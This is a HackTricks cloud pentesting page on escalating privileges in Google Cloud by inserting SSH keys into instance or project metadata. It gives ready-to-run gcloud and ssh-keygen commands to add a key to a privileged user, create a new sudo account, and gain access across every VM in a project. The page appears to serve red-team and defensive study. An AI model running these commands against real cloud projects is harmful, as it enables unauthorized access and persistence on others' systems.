GCP - Add Custom SSH Metadata

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Modifying the metadata

Metadata modification on an instance could lead to significant security risks if an attacker gains the necessary permissions.

Incorporation of SSH Keys into Custom Metadata

On GCP, Linux systems often execute scripts from the Python Linux Guest Environment for Google Compute Engine. A critical component of this is the accounts daemon, which is designed to regularly check the instance metadata endpoint for updates to the authorized SSH public keys.

Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and integrated into the local system. The key will be added into ~/.ssh/authorized_keys file of an existing user or potentially creating a new user with sudo privileges, depending on the key's format. And the attacker will be able to compromise the host.

Add SSH key to existing privileged user

Examine Existing SSH Keys on the Instance:
- Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under metadata, specifically the ssh-keys key.
  gcloud compute instances describe [INSTANCE] --zone [ZONE]
- Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon.
Prepare a Text File for SSH Key Metadata:
- Save the details of usernames and their corresponding SSH keys into a text file named meta.txt. This is essential for preserving the existing keys while adding new ones.
Generate a New SSH Key for the Target User (alice in this example):
- Use the ssh-keygen command to generate a new SSH key, ensuring that the comment field (-C) matches the target username.
  ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub
- Add the new public key to meta.txt, mimicking the format found in the instance's metadata.
Update the Instance's SSH Key Metadata:
- Apply the updated SSH key metadata to the instance using the gcloud compute instances add-metadata command.
  gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
Access the Instance Using the New SSH Key:
- Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (alice in this example).
  ssh -i ./key alice@localhost sudo id

Create a new privileged user and add a SSH key

If no interesting user is found, it's possible to create a new one which will be given sudo privileges:

# define the new account username
NEWUSER="definitelynotahacker"

# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""

# create the input meta file
NEWKEY="$(cat ./key.pub)"
echo "$NEWUSER:$NEWKEY" > ./meta.txt

# update the instance metadata
gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt

# ssh to the new account
ssh -i ./key "$NEWUSER"@localhost

SSH keys at project level

It's possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by applying SSH keys at the project level. This approach allows SSH access to any instance within the project that hasn't explicitly blocked project-wide SSH keys. Here's a summarized guide:

Apply SSH Keys at the Project Level:
- Use the gcloud compute project-info add-metadata command to add SSH keys from meta.txt to the project's metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the "Block project-wide SSH keys" option enabled.
  gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt
SSH into Instances Using Project-Wide Keys:
- With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access.
- A direct method to SSH into an instance is using the gcloud compute ssh [INSTANCE] command. This command uses your current username and the SSH keys set at the project level to attempt access.

References

https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousGCP - Compute Privesc NextGCP - Composer Privesc

Last updated 2 months ago